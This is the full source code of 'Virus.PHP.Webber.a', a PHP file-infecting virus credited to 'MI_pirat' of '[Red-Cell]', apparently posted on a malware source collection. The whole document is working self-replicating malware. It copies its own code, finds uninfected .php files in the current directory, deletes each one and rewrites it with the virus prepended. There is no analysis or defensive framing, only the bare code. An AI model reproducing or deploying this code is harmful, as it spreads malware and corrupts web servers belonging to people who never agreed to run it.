Virus.PHP.Webber.a - Source Code

1. <?php
2. function webb()
3. {
4. //[WEbbER] by MI_pirat
5. //Copyright (C) 2002 [Red-Cell] inc.
6. $c = "";
7. //Get the virus from the host file
8. $f = fopen (__FILE__, "r");
9. $c = fread ($f, filesize (__FILE__));
10. fclose ($f);
11. $c = substr($c,0,866);
12. //Search for files to infect
13. $handle=opendir('.');
14. while (($file = readdir($handle))!==false) {
15. if ($file != "." && $file != "..")
16.  {
17. $s = substr($file, -3);
18. //If not infected yet, infect it!
19. if ($s=="php")
20.    {
21.     $g = fopen ($file, "r");
22.     $cont = fread ($g,filesize ($file));      
23.     fclose ($g);
24.     if (!strstr($cont,"[WEbbER]")) //check the signature
25.     {
26.     unlink("$file"); //delete and prepend the virus
27.     $g = fopen ($file, "a+");
28.     fwrite ($g,"$c");      
29.     fwrite ($g,"\n");
30.     fwrite ($g,substr($cont,5)); //append the original file
31.     fclose ($g);
32.     }
33.    }
34.  
35.  }
36.  
37. }
38.  
39. closedir($handle);
40. }
41. webb();
42. ?>